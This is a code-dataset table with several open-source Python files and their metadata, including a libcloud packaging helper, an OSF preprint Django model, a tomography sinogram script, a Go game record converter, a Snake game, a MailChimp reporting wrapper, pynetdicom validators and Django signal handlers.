repo_name (string) | path (string) | copies (string) | size (string) | text (string) | license (string, 15 classes) | hash (int64) | line_mean (float64) | line_max (int64) | alpha_frac (float64) | autogenerated (bool) | ratio (float64) | config_test (bool) | has_no_keywords (bool) | few_assignments (bool) |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
mbrukman/libcloud | libcloud/utils/dist.py | 57 | 4973 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Taken from Twisted Python, which is licensed under the MIT license
# https://github.com/powdahound/twisted/blob/master/twisted/python/dist.py
# https://github.com/powdahound/twisted/blob/master/LICENSE
import os
import fnmatch
# Names that are excluded from globbing results:
EXCLUDE_NAMES = ['{arch}', 'CVS', '.cvsignore', '_darcs',
'RCS', 'SCCS', '.svn']
EXCLUDE_PATTERNS = ['*.py[cdo]', '*.s[ol]', '.#*', '*~', '*.py']
def _filter_names(names):
"""
Given a list of file names, return those names that should be copied.
"""
names = [n for n in names
if n not in EXCLUDE_NAMES]
# This is needed when building a distro from a working
# copy (likely a checkout) rather than a pristine export:
for pattern in EXCLUDE_PATTERNS:
names = [n for n in names
if not fnmatch.fnmatch(n, pattern) and not n.endswith('.py')]
return names
def relative_to(base, relativee):
"""
Gets 'relativee' relative to 'basepath'.
i.e.,
>>> relative_to('/home/', '/home/radix/')
'radix'
>>> relative_to('.', '/home/radix/Projects/Twisted')
'Projects/Twisted'
The 'relativee' must be a child of 'basepath'.
"""
basepath = os.path.abspath(base)
relativee = os.path.abspath(relativee)
if relativee.startswith(basepath):
relative = relativee[len(basepath):]
if relative.startswith(os.sep):
relative = relative[1:]
return os.path.join(base, relative)
raise ValueError("%s is not a subpath of %s" % (relativee, basepath))
def get_packages(dname, pkgname=None, results=None, ignore=None, parent=None):
"""
Get all packages which are under dname. This is necessary for
    Python 2.2's distutils. Pretty similar arguments to get_data_files,
including 'parent'.
"""
parent = parent or ""
prefix = []
if parent:
prefix = [parent]
bname = os.path.basename(dname)
ignore = ignore or []
if bname in ignore:
return []
if results is None:
results = []
if pkgname is None:
pkgname = []
subfiles = os.listdir(dname)
abssubfiles = [os.path.join(dname, x) for x in subfiles]
if '__init__.py' in subfiles:
results.append(prefix + pkgname + [bname])
for subdir in filter(os.path.isdir, abssubfiles):
get_packages(subdir, pkgname=pkgname + [bname],
results=results, ignore=ignore,
parent=parent)
res = ['.'.join(result) for result in results]
return res
def get_data_files(dname, ignore=None, parent=None):
"""
Get all the data files that should be included in this distutils Project.
'dname' should be the path to the package that you're distributing.
'ignore' is a list of sub-packages to ignore. This facilitates
disparate package hierarchies. That's a fancy way of saying that
the 'twisted' package doesn't want to include the 'twisted.conch'
package, so it will pass ['conch'] as the value.
'parent' is necessary if you're distributing a subpackage like
twisted.conch. 'dname' should point to 'twisted/conch' and 'parent'
should point to 'twisted'. This ensures that your data_files are
generated correctly, only using relative paths for the first element
of the tuple ('twisted/conch/*').
The default 'parent' is the current working directory.
"""
parent = parent or "."
ignore = ignore or []
result = []
for directory, subdirectories, filenames in os.walk(dname):
resultfiles = []
for exname in EXCLUDE_NAMES:
if exname in subdirectories:
subdirectories.remove(exname)
for ig in ignore:
if ig in subdirectories:
subdirectories.remove(ig)
for filename in _filter_names(filenames):
resultfiles.append(filename)
if resultfiles:
for filename in resultfiles:
file_path = os.path.join(directory, filename)
if parent:
file_path = file_path.replace(parent + os.sep, '')
result.append(file_path)
return result
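# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module): a minimal,
# self-contained demonstration of the filename filter defined above. In a
# real setup.py, get_packages() and get_data_files() would instead be called
# with the package directory (e.g. 'libcloud') as 'dname'.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    sample = ['module.py', 'module.pyc', 'notes.txt', 'CVS', 'README']
    # 'CVS' is dropped via EXCLUDE_NAMES and the Python sources match
    # EXCLUDE_PATTERNS, so only 'notes.txt' and 'README' survive.
    print(_filter_names(sample))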
| apache-2.0 | 4,766,146,444,383,373,000 | 35.837037 | 78 | 0.647899 | false | 3.931225 | false | false | false |
caseyrollins/osf.io | osf/models/preprint_service.py | 2 | 13310 | # -*- coding: utf-8 -*-
import urlparse
import logging
from dirtyfields import DirtyFieldsMixin
from django.db import models
from django.utils import timezone
from django.contrib.contenttypes.fields import GenericRelation
from django.core.exceptions import ValidationError
from framework.exceptions import PermissionsError
from osf.models.nodelog import NodeLog
from osf.models.mixins import ReviewableMixin
from osf.models import OSFUser
from osf.utils.fields import NonNaiveDateTimeField
from osf.utils.workflows import ReviewStates
from osf.utils.permissions import ADMIN
from osf.utils.requests import DummyRequest, get_request_and_user_id, get_headers_from_request
from website.notifications.emails import get_user_subscriptions
from website.notifications import utils
from website.preprints.tasks import update_or_enqueue_on_preprint_updated
from website.project.licenses import set_license
from website.util import api_v2_url
from website.identifiers.clients import CrossRefClient, ECSArXivCrossRefClient
from website import settings, mails
from osf.models.base import BaseModel, GuidMixin
from osf.models.identifiers import IdentifierMixin, Identifier
from osf.models.mixins import TaxonomizableMixin
from osf.models.spam import SpamMixin
logger = logging.getLogger(__name__)
class PreprintService(DirtyFieldsMixin, SpamMixin, GuidMixin, IdentifierMixin, ReviewableMixin, TaxonomizableMixin, BaseModel):
SPAM_CHECK_FIELDS = set()
provider = models.ForeignKey('osf.PreprintProvider',
on_delete=models.SET_NULL,
related_name='preprint_services',
null=True, blank=True, db_index=True)
node = models.ForeignKey('osf.AbstractNode', on_delete=models.SET_NULL,
related_name='preprints',
null=True, blank=True, db_index=True)
is_published = models.BooleanField(default=False, db_index=True)
date_published = NonNaiveDateTimeField(null=True, blank=True)
original_publication_date = NonNaiveDateTimeField(null=True, blank=True)
license = models.ForeignKey('osf.NodeLicenseRecord',
on_delete=models.SET_NULL, null=True, blank=True)
identifiers = GenericRelation(Identifier, related_query_name='preprintservices')
preprint_doi_created = NonNaiveDateTimeField(default=None, null=True, blank=True)
date_withdrawn = NonNaiveDateTimeField(default=None, null=True, blank=True)
withdrawal_justification = models.TextField(default='', blank=True)
ever_public = models.BooleanField(default=False, blank=True)
class Meta:
unique_together = ('node', 'provider')
permissions = (
('view_preprintservice', 'Can view preprint service details in the admin app.'),
)
def __unicode__(self):
return '{} preprint (guid={}) of {}'.format('published' if self.is_published else 'unpublished', self._id, self.node.__unicode__() if self.node else None)
@property
def verified_publishable(self):
return self.is_published and self.node.is_preprint and not (self.is_retracted or self.node.is_deleted)
@property
def primary_file(self):
if not self.node:
return
return self.node.preprint_file
@property
def is_retracted(self):
return self.date_withdrawn is not None
@property
def article_doi(self):
if not self.node:
return
return self.node.preprint_article_doi
@property
def preprint_doi(self):
return self.get_identifier_value('doi')
@property
def is_preprint_orphan(self):
if not self.node:
return
return self.node.is_preprint_orphan
@property
def deep_url(self):
# Required for GUID routing
return '/preprints/{}/'.format(self._primary_key)
@property
def url(self):
if (self.provider.domain_redirect_enabled and self.provider.domain) or self.provider._id == 'osf':
return '/{}/'.format(self._id)
return '/preprints/{}/{}/'.format(self.provider._id, self._id)
@property
def absolute_url(self):
return urlparse.urljoin(
self.provider.domain if self.provider.domain_redirect_enabled else settings.DOMAIN,
self.url
)
@property
def absolute_api_v2_url(self):
path = '/preprints/{}/'.format(self._id)
return api_v2_url(path)
@property
def should_request_identifiers(self):
return not self.node.all_tags.filter(name='qatest').exists()
@property
def has_pending_withdrawal_request(self):
return self.requests.filter(request_type='withdrawal', machine_state='pending').exists()
@property
def has_withdrawal_request(self):
return self.requests.filter(request_type='withdrawal').exists()
def has_permission(self, *args, **kwargs):
return self.node.has_permission(*args, **kwargs)
def set_primary_file(self, preprint_file, auth, save=False):
if not self.node.has_permission(auth.user, ADMIN):
raise PermissionsError('Only admins can change a preprint\'s primary file.')
if preprint_file.target != self.node or preprint_file.provider != 'osfstorage':
raise ValueError('This file is not a valid primary file for this preprint.')
existing_file = self.node.preprint_file
self.node.preprint_file = preprint_file
# only log if updating the preprint file, not adding for the first time
if existing_file:
self.node.add_log(
action=NodeLog.PREPRINT_FILE_UPDATED,
params={
'preprint': self._id
},
auth=auth,
save=False
)
if save:
self.save()
self.node.save()
def set_published(self, published, auth, save=False):
if not self.node.has_permission(auth.user, ADMIN):
raise PermissionsError('Only admins can publish a preprint.')
if self.is_published and not published:
raise ValueError('Cannot unpublish preprint.')
self.is_published = published
if published:
if not (self.node.preprint_file and self.node.preprint_file.target == self.node):
raise ValueError('Preprint node is not a valid preprint; cannot publish.')
if not self.provider:
raise ValueError('Preprint provider not specified; cannot publish.')
if not self.subjects.exists():
raise ValueError('Preprint must have at least one subject to be published.')
self.date_published = timezone.now()
self.node._has_abandoned_preprint = False
# In case this provider is ever set up to use a reviews workflow, put this preprint in a sensible state
self.machine_state = ReviewStates.ACCEPTED.value
self.date_last_transitioned = self.date_published
# This preprint will have a tombstone page when it's withdrawn.
self.ever_public = True
self.node.add_log(
action=NodeLog.PREPRINT_INITIATED,
params={
'preprint': self._id
},
auth=auth,
save=False,
)
if not self.node.is_public:
self.node.set_privacy(
self.node.PUBLIC,
auth=None,
log=True
)
self._send_preprint_confirmation(auth)
if save:
self.node.save()
self.save()
def set_preprint_license(self, license_detail, auth, save=False):
license_record, license_changed = set_license(self, license_detail, auth, node_type='preprint')
if license_changed:
self.node.add_log(
action=NodeLog.PREPRINT_LICENSE_UPDATED,
params={
'preprint': self._id,
'new_license': license_record.node_license.name
},
auth=auth,
save=False
)
if save:
self.save()
def set_identifier_values(self, doi, save=False):
self.set_identifier_value('doi', doi)
self.preprint_doi_created = timezone.now()
if save:
self.save()
def get_doi_client(self):
if settings.CROSSREF_URL:
if self.provider._id == 'ecsarxiv':
return ECSArXivCrossRefClient(base_url=settings.CROSSREF_URL)
return CrossRefClient(base_url=settings.CROSSREF_URL)
else:
return None
def save(self, *args, **kwargs):
first_save = not bool(self.pk)
saved_fields = self.get_dirty_fields() or []
old_subjects = kwargs.pop('old_subjects', [])
if saved_fields:
request, user_id = get_request_and_user_id()
request_headers = {}
if not isinstance(request, DummyRequest):
request_headers = {
k: v
for k, v in get_headers_from_request(request).items()
if isinstance(v, basestring)
}
user = OSFUser.load(user_id)
if user:
self.check_spam(user, saved_fields, request_headers)
if not first_save and ('ever_public' in saved_fields and saved_fields['ever_public']):
raise ValidationError('Cannot set "ever_public" to False')
ret = super(PreprintService, self).save(*args, **kwargs)
if (not first_save and 'is_published' in saved_fields) or self.is_published:
update_or_enqueue_on_preprint_updated(preprint_id=self._id, old_subjects=old_subjects, saved_fields=saved_fields)
return ret
def _get_spam_content(self, saved_fields):
spam_fields = self.SPAM_CHECK_FIELDS if self.is_published and 'is_published' in saved_fields else self.SPAM_CHECK_FIELDS.intersection(
saved_fields)
content = []
for field in spam_fields:
content.append((getattr(self.node, field, None) or '').encode('utf-8'))
if self.node.all_tags.exists():
content.extend([name.encode('utf-8') for name in self.node.all_tags.values_list('name', flat=True)])
if not content:
return None
return ' '.join(content)
def check_spam(self, user, saved_fields, request_headers):
if not settings.SPAM_CHECK_ENABLED:
return False
if settings.SPAM_CHECK_PUBLIC_ONLY and not self.node.is_public:
return False
if 'ham_confirmed' in user.system_tags:
return False
content = self._get_spam_content(saved_fields)
if not content:
return
is_spam = self.do_check_spam(
user.fullname,
user.username,
content,
request_headers,
)
logger.info("Preprint ({}) '{}' smells like {} (tip: {})".format(
self._id, self.node.title.encode('utf-8'), 'SPAM' if is_spam else 'HAM', self.spam_pro_tip
))
if is_spam:
self.node._check_spam_user(user)
return is_spam
def _check_spam_user(self, user):
self.node._check_spam_user(user)
def flag_spam(self):
""" Overrides SpamMixin#flag_spam.
"""
super(PreprintService, self).flag_spam()
self.node.flag_spam()
def confirm_spam(self, save=False):
super(PreprintService, self).confirm_spam(save=save)
self.node.confirm_spam(save=save)
def confirm_ham(self, save=False):
super(PreprintService, self).confirm_ham(save=save)
self.node.confirm_ham(save=save)
def _send_preprint_confirmation(self, auth):
# Send creator confirmation email
recipient = self.node.creator
event_type = utils.find_subscription_type('global_reviews')
user_subscriptions = get_user_subscriptions(recipient, event_type)
if self.provider._id == 'osf':
logo = settings.OSF_PREPRINTS_LOGO
else:
logo = self.provider._id
context = {
'domain': settings.DOMAIN,
'reviewable': self,
'workflow': self.provider.reviews_workflow,
'provider_url': '{domain}preprints/{provider_id}'.format(
domain=self.provider.domain or settings.DOMAIN,
provider_id=self.provider._id if not self.provider.domain else '').strip('/'),
'provider_contact_email': self.provider.email_contact or settings.OSF_CONTACT_EMAIL,
'provider_support_email': self.provider.email_support or settings.OSF_SUPPORT_EMAIL,
'no_future_emails': user_subscriptions['none'],
'is_creator': True,
'provider_name': 'OSF Preprints' if self.provider.name == 'Open Science Framework' else self.provider.name,
'logo': logo,
}
mails.send_mail(
recipient.username,
mails.REVIEWS_SUBMISSION_CONFIRMATION,
mimetype='html',
user=recipient,
**context
)
| apache-2.0 | 7,554,843,069,861,371,000 | 37.247126 | 162 | 0.615101 | false | 4.075321 | false | false | false |
jonwright/ImageD11 | sandbox/ftomo.py | 1 | 4480 |
from __future__ import print_function
import math, numpy, time
from ImageD11 import cImageD11
from fabio.openimage import openimage
print("Using class version")
class fourier_radial(object):
""" Cache results for re-use where possible on next layer """
def __init__(self, dims, theta=None):
self.dims = dims
self.theta = theta
if self.theta is not None:
assert len(self.theta) == dims[1]
self.theta = numpy.array(theta)*numpy.pi/180.0
self.make_indices()
def set_theta(self, theta):
"""
th is the list of angles in degrees of the projections
assumed 1 degree steps otherwise
"""
self.theta = theta
assert len(self.theta) == self.dims[1]
self.theta = numpy.array(theta)*numpy.pi/180.0
self.make_indices()
def make_indices(self):
arshape = self.dims[0]/2+1, self.dims[1]
nv = (arshape[0]-1)*2
nh = arshape[0]
print("NV,NH",nv,nh)
self.ftimshape = (nv, nh)
self.ftimlen = nv*nh
n1 = (self.dims[0]/2+1)*self.dims[1]
xv = numpy.arange(0, self.dims[0]/2+1, 1,
dtype=numpy.float32 )
# dimensions?
cth = numpy.cos( self.theta ) # 1D
sth = numpy.sin( self.theta ) # 1D
ia = numpy.round(numpy.outer( cth, xv )).astype(numpy.int)
ja = numpy.round(numpy.outer( sth, xv )).astype(numpy.int)
on = numpy.array([1.0],numpy.float32)
jm = numpy.where(ja < 0, -on, on)
numpy.multiply( ia, jm, ia ) # if j<0: i=-i
numpy.multiply( ja, jm, ja ) # if j<0: j=-j
# if j<0: f=f.conj()
ia = numpy.where( ia < 0, nv+ia, ia)
inds = (ia*nh + ja).ravel()
self.conjer = jm
self.inds = inds
nim = numpy.zeros( ( nv* nh), numpy.float32 )
wons = numpy.ones( (len(inds)), dtype=numpy.float32 )
# This is now more dense - bincount?
cImageD11.put_incr( nim , inds, wons )
nim = nim.astype(numpy.int)
self.nim_div = nim + (nim==0)
def process_sinogram( self,
sinogram,
do_interpolation=False):
"""
sinogram is from the data
dimensions [npixels, nangles]
do_interp - tries to fill in some of the missing data in
fourier space
returns the radon transform
"""
assert sinogram.shape == self.dims
ar = numpy.fft.rfft(sinogram, axis=0)
faprojr = (ar.T.real.astype(numpy.float32))
faprojc = (ar.T.imag.astype(numpy.float32))
numpy.multiply( faprojc, self.conjer, faprojc)
fimr = numpy.zeros( self.ftimlen , numpy.float32 )
fimc = numpy.zeros( self.ftimlen , numpy.float32 )
cImageD11.put_incr( fimr, self.inds, faprojr.ravel())
cImageD11.put_incr( fimc, self.inds, faprojc.ravel())
fim = fimr + fimc*1j
fim = numpy.divide( fimr + fimc*1j, self.nim_div)
fim.shape = self.ftimshape
return fim
def sino2im(self, sinogram, centrepixel ):
# Take out high frequency in mean (some ring artifacts)
s = sinogram
cp = centrepixel
d = numpy.concatenate( ( s[cp:,:], s[:cp,:], ), axis=0)
im = self.process_sinogram( d , centrepixel )
# figure out what the scale factor really is
ret = numpy.fft.irfft2( im ) * im.shape[0] * im.shape[1]
ret = numpy.fft.fftshift( ret )
return ret
if __name__=="__main__":
import sys
if len(sys.argv) != 5:
print("Usage: sinogram startangle step centrepixel")
sys.exit()
fname = sys.argv[1]
star = time.time()
sino = openimage( fname )
na,nx = sino.data.shape
start = float(sys.argv[2])
step = float(sys.argv[3])
centrepixel = int( sys.argv[4] )
end = na*step + start
print("start, step, end",start, step, end)
angles = numpy.arange(start, end, step)
assert len(angles) == na,"%d %d ... %d"%(nx,na,len(angles))
print("%.2f setup"%(time.time()-star))
d = sino.data.T[:1200]
o = fourier_radial( d.shape, angles )
start = time.time()
im = o.sino2im( d, centrepixel )
sino.data = im
sino.write(fname+"_r", force_type=numpy.float32)
import pylab
pylab.imshow(im, interpolation='nearest',aspect='auto')
pylab.show()
print("per image",time.time()-start)
| gpl-2.0 | 561,290,789,958,171,500 | 33.728682 | 68 | 0.561607 | false | 3.150492 | false | false | false |
yenw/computer-go-dataset | Tom/Converter_Tom.py | 1 | 2988 | #!/bin/python
# encoding=utf8
import sys
import platform
def kifu_converter(index_name, user_id, kifu_folder, save_folder):
f = open(index_name)
stack = []
save_index = ""
for line in f:
line = line.decode('utf-8')
line_r = line.split('\t')
if line_r[2] != user_id and line_r[3] != user_id:
continue
save_index += line
Num = line_r[0]
fn_sgf = line_r[1][0:4] + "-" + line_r[1][5:7]
DT = line_r[1]
PW = line_r[2]
PB = line_r[3]
RE = line_r[5]
RO = line_r[6]
TM = line_r[7].split(' ')[1][0:-2] + " min"
OT = line_r[7].split(' ')[0]
OT = OT.split('/')[1] + "x " + OT.split('/')[0] + " sec"
SGF = "(;CA[UTF-8]GM[1]FF[4]AP[converter]\nSZ[19]"
SGF += "GN[" + Num + "]\n"
SGF += "DT[" + DT + "]\n"
SGF += "PB[" + PB + "]" + "BR[9d]\n"
SGF += "PW[" + PW + "]" + "WR[9d]\n"
SGF += "RE[" + RE + "]"
SGF += "RO[" + RO + "]"
SGF += "KM[6.5]"
SGF += "RU[Japanese]"
SGF += "TM[" + TM + "]" + "OT[" + OT + "]\n"
SGF += "PC[Tom]"
stack.append([SGF, fn_sgf, Num])
f.close()
writer = open(user_id + ".index", "w")
writer.write(save_index.encode('utf-8'))
writer.close()
    # platform.system() returns "Windows"/"Linux"/"Darwin"; platform.platform()
    # returns a longer version string and would never equal "Windows" exactly.
    if platform.system() == "Windows":
if kifu_folder[-1] != "\\":
kifu_folder += "\\"
if save_folder[-1] != "\\":
save_folder += "\\"
else:
if kifu_folder[-1] != "/":
kifu_folder += "/"
if save_folder[-1] != "/":
save_folder += "/"
i = 0
stack_size = len(stack)
while i < stack_size:
info = stack[i]
SGF = info[0]
fn_sgf = info[1]
fn_open = fn_sgf
Num = info[2]
f_sgf = open(kifu_folder + fn_sgf)
for line_sgf in f_sgf:
line_sgf = line_sgf.decode('utf-8')
split = line_sgf.split('\t')
if split[0] == Num:
SGF += split[1] + ")"
writer = open(save_folder + Num + ".SGF", "w")
writer.write(SGF.encode('utf-8'))
writer.close()
if i + 1 >= stack_size:
break
if fn_open != stack[i + 1][1]:
break
i += 1
info = stack[i]
SGF = info[0]
fn_sgf = info[1]
Num = info[2]
f_sgf.close()
i += 1
if len(sys.argv) != 5:
print "usage: python Converter_Tom.py Kifu.index user_id kifu_folder save_folder"
print "example: python Converter_Tom.py Kifu.index 930115 kifu save"
else:
index_name = sys.argv[1]
user_id = sys.argv[2]
kifu_folder = sys.argv[3]
save_folder = sys.argv[4]
kifu_converter(index_name, user_id, kifu_folder, save_folder)
| gpl-3.0 | -1,515,790,253,295,045,600 | 28.489796 | 85 | 0.422691 | false | 2.990991 | false | false | false |
mckesson-uspharmamarketing/mailchimp-API-handler | mailchimp_api_wrapper.py | 1 | 4261 | from __future__ import division
import json
import mailchimp3
from mailchimp3 import MailChimp
from user_login_credentials import user_name
from user_login_credentials import api_key
class single_report:
def __init__(self, report_data):
self.campaign_id = report_data['id']
self.subject_line = report_data['subject_line']
self.list_name = report_data['list_name']
self.send_time = report_data['send_time']
self.total_sent = report_data['emails_sent']
self.total_bounces = report_data['bounces']['hard_bounces'] + report_data['bounces']['soft_bounces'] + report_data['bounces']['syntax_errors']
self.hard_bounces = report_data['bounces']['hard_bounces']
self.soft_bounces = report_data['bounces']['soft_bounces']
self.total_delivered = self.total_sent - self.total_bounces
self.unsubscribes = report_data['unsubscribed']
self.total_opens = report_data['opens']['opens_total']
self.unique_opens = report_data['opens']['unique_opens']
self.total_clicks = report_data['clicks']['clicks_total']
self.unique_clicks = report_data['clicks']['unique_clicks']
self.send_date = self.send_time[0:10]
self.delivery_rate = str(self.total_delivered / self.total_sent * 100) + "%"
self.open_rate = str("%.2f" % (report_data['opens']['open_rate'] * 100)) + "%"
self.click_rate = str("%.2f" % (report_data['clicks']['click_rate'] * 100)) + "%"
self.clickthru_rate = str("%.2f" % (self.total_clicks / self.total_delivered * 100)) + "%"
#self.click_report = ""
def reports_result(date_range, campaign_name_search):
client = MailChimp(user_name, api_key)
all_json_data = client.reports.all(get_all=True)
all_reports = all_json_data['reports']
reports_in_daterange = all_reports#[0:50] # TODO: create new method find_index_for_date_range to handle a simple string date range input and provide the right index number for this filter
matching_reports = [reports for reports in reports_in_daterange if campaign_name_search in reports["campaign_title"]]
return matching_reports
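# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module). It assumes
# valid credentials in user_login_credentials and a sent campaign whose title
# contains the made-up search string 'Newsletter'; the date_range argument is
# currently unused (see the TODO above).
#
#     for raw in reports_result(None, 'Newsletter'):
#         report = single_report(raw)
#         print("{0}: open {1}, click {2}".format(
#             report.subject_line, report.open_rate, report.click_rate))
# ---------------------------------------------------------------------------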
"""
def get_click_report(campaign_id):
client = MailChimp(user_name, api_key)
json_data = client.reports.click_details.all(campaign_id=campaign_id, get_all=False)
click_report = json_data['urls_clicked']
return click_report
"""
class click_report_object():
def __init__(self, c_id):
client = MailChimp(user_name, api_key)
json_data = client.reports.click_details.all(campaign_id=c_id, get_all=False)
links_clicked = json_data['urls_clicked']
self.url_1 = links_clicked[0]["url"]
self.total_clicks_1 = links_clicked[0]["total_clicks"]
self.total_click_percent_1 = links_clicked[0]["click_percentage"]
self.unique_clicks_1 = links_clicked[0]["unique_clicks"]
self.unique_click_percent_1 = links_clicked[0]["unique_click_percentage"]
self.url_2 = links_clicked[1]["url"]
self.total_clicks_2 = links_clicked[1]["total_clicks"]
self.total_click_percent_2 = links_clicked[1]["click_percentage"]
self.unique_clicks_2 = links_clicked[1]["unique_clicks"]
self.unique_click_percent_2 = links_clicked[1]["unique_click_percentage"]
self.url_3 = links_clicked[2]["url"]
self.total_clicks_3 = links_clicked[2]["total_clicks"]
self.total_click_percent_3 = links_clicked[2]["click_percentage"]
self.unique_clicks_3 = links_clicked[2]["unique_clicks"]
self.unique_click_percent_3 = links_clicked[2]["unique_click_percentage"]
self.url_4 = links_clicked[3]["url"]
self.total_clicks_4 = links_clicked[3]["total_clicks"]
self.total_click_percent_4 = links_clicked[3]["click_percentage"]
self.unique_clicks_4 = links_clicked[3]["unique_clicks"]
self.unique_click_percent_4 = links_clicked[3]["unique_click_percentage"]
self.url_5 = links_clicked[4]["url"]
self.total_clicks_5 = links_clicked[4]["total_clicks"]
self.total_click_percent_5 = links_clicked[4]["click_percentage"]
self.unique_clicks_5 = links_clicked[4]["unique_clicks"]
self.unique_click_percent_5 = links_clicked[4]["unique_click_percentage"]
self.url_6 = links_clicked[5]["url"]
self.total_clicks_6 = links_clicked[5]["total_clicks"]
self.total_click_percent_6 = links_clicked[5]["click_percentage"]
self.unique_clicks_6 = links_clicked[5]["unique_clicks"]
self.unique_click_percent_6 = links_clicked[5]["unique_click_percentage"] | apache-2.0 | 3,937,751,821,937,486,300 | 46.355556 | 188 | 0.711101 | false | 2.892736 | false | false | false |
scaramallion/pynetdicom | pynetdicom/_validators.py | 1 | 2079 | """Validation functions used by pynetdicom"""
from collections import OrderedDict
import logging
from typing import Union, Dict, Optional, cast, Tuple
import unicodedata
from pydicom.dataset import Dataset
from pydicom.uid import UID
LOGGER = logging.getLogger('pynetdicom._validators')
def validate_ae(value: str) -> Tuple[bool, str]:
"""Return ``True`` if `value` is a conformant **AE** value.
An **AE** value:
* Must be no more than 16 characters
* Leading and trailing spaces are not significant
* May only use ASCII characters, excluding ``0x5C`` (backslash) and all
control characters
Parameters
----------
value : str
The **AE** value to check.
Returns
-------
Tuple[bool, str]
A tuple of (bool, str), with the first item being ``True`` if the
value is conformant to the DICOM Standard and ``False`` otherwise and
the second item being a short description of why the validation failed
or ``''`` if validation was successful.
"""
if not isinstance(value, str):
return False, "must be str"
if len(value) > 16:
return False, "must not exceed 16 characters"
# All characters use ASCII
if not value.isascii():
return False, "must only contain ASCII characters"
# Unicode category: 'Cc' is control characters
invalid = [c for c in value if unicodedata.category(c)[0] == 'C']
if invalid or '\\' in value:
return False, "must not contain control characters or backslashes"
return True, ''
def validate_ui(value: UID) -> Tuple[bool, str]:
    """Return ``True`` if `value` is a conformant **UI** (UID) value, plus a
    short description of why validation failed (or ``''`` on success).
    """
    from pynetdicom import _config
if not isinstance(value, str):
return False, "must be pydicom.uid.UID"
value = UID(value)
if _config.ENFORCE_UID_CONFORMANCE:
if value.is_valid:
return True, ""
return False, "UID is non-conformant"
if not 0 < len(value):
return False, "must not be an empty str"
if not len(value) < 65:
return False, "must not exceed 64 characters"
return True, ""
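# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module): both validators
# return a (bool, str) tuple, so callers unpack the flag and the reason.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    print(validate_ae('STORE_SCP'))   # -> (True, '')
    print(validate_ae('A' * 20))      # -> (False, 'must not exceed 16 characters')
    print(validate_ui(UID('1.2.840.10008.1.1')))  # -> (True, '')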
| mit | 3,829,577,689,415,675,400 | 26 | 78 | 0.643098 | false | 4.068493 | false | false | false |
chenchiyuan/hawaii | hawaii/apps/commodity/signals.py | 1 | 1434 | # -*- coding: utf-8 -*-
# __author__ = chenchiyuan
from __future__ import division, unicode_literals, print_function
from django.db.models.signals import m2m_changed
def commodity_inventory_changed(sender, instance, *args, **kwargs):
from libs.datetimes import dates_during
from hawaii.apps.commodity.models import CommodityProduct, CommodityInventory
inventory = CommodityInventory.objects.select_related().get(pk=instance.pk)
weekdays = inventory.days.values_list("number", flat=True)
dates = dates_during(from_date=inventory.begin, to_date=inventory.end, weekdays=weekdays)
copy_dates = dates[:]
products = list(inventory.products.all())
products_will_delete = []
for product in products:
if not product.datetime.date in copy_dates:
products_will_delete.append(product.id)
else:
dates.remove(product.date)
# delete products
CommodityProduct.objects.filter(id__in=products_will_delete).delete()
# create products
CommodityProduct.bulk_create_products(inventory, dates)
def register_commodity_inventory_changed():
from hawaii.apps.commodity.models import CommodityInventory
m2m_changed.connect(commodity_inventory_changed, sender=CommodityInventory.days.through, dispatch_uid='commodity_inventory_changed')
def register_commodity_signals():
register_commodity_inventory_changed()
print("commodity signal register") | bsd-3-clause | -6,126,397,034,087,340,000 | 35.794872 | 136 | 0.735704 | false | 3.686375 | false | false | false |
umbc-hackafe/sign-drivers | python/games/snake.py | 1 | 2701 | import graphics
import driver
import game
import random
class Snake(game.Game):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.reset()
def reset(self):
self.sprites.clear()
self.playing = True
self.snake = [graphics.Rectangle(1, 1, x=7, y=7)]
self.direction = (1,0)
self.sprites.add(self.snake[0])
self.food = graphics.Rectangle(1, 1, x=17, y=7)
self.sprites.add(self.food)
self.count = 0
def loop(self):
if self.playing:
if 'a' in self.keys and not self.direction[0]:
self.direction = (-1, 0)
elif 'd' in self.keys and not self.direction[0]:
self.direction = (1, 0)
if 's' in self.keys and not self.direction[1]:
self.direction = (0, 1)
elif 'w' in self.keys and not self.direction[1]:
self.direction = (0, -1)
self.count = (self.count + 1) % 2
if not self.count:
for i in range(len(self.snake) - 1, 0, -1):
self.snake[i].x = self.snake[i-1].x
self.snake[i].y = self.snake[i-1].y
self.snake[0].x += self.direction[0]
self.snake[0].y += self.direction[1]
poses = set((s.x, s.y) for s in self.snake[1:])
if (self.snake[0].x < 0 or self.snake[0].x >= 112
or self.snake[0].y < 0 or self.snake[0].y >= 15
or (self.snake[0].x, self.snake[0].y) in poses):
self.sprites.clear()
self.sprites.add(graphics.TextSprite(
'GAME OVER. LEN:{}'.format(len(self.snake)),
width=5, height=7))
self.sprites.add(graphics.TextSprite(
'R TO RELOAD'.format(len(self.snake)),
width=5, height=7, y=8))
self.playing = False
if (self.snake[0].x, self.snake[0].y) == (self.food.x, self.food.y):
self.snake.append(self.food)
poses.add((self.snake[0].x, self.snake[0].y))
nx, ny = random.randrange(0, 112), random.randrange(0, 15)
while (nx,ny) in poses:
nx, ny = random.randrange(0, 112), random.randrange(0, 15)
self.food = graphics.Rectangle(1, 1, x=nx, y=ny)
self.sprites.add(self.food)
else:
if 'r' in self.keys:
self.reset()
super().loop()
GAME = Snake
| mit | -1,034,839,308,905,894,900 | 35.013333 | 84 | 0.466124 | false | 3.620643 | false | false | false |
dmsurti/reynolds-blender | reynolds_blender/models.py | 1 | 6371 | #------------------------------------------------------------------------------
# Reynolds-Blender | The Blender add-on for Reynolds, an OpenFoam toolbox.
#------------------------------------------------------------------------------
# Copyright
#------------------------------------------------------------------------------
# Deepak Surti ([email protected])
# Prabhu R (IIT Bombay, [email protected])
# Shivasubramanian G (IIT Bombay, [email protected])
#------------------------------------------------------------------------------
# License
#
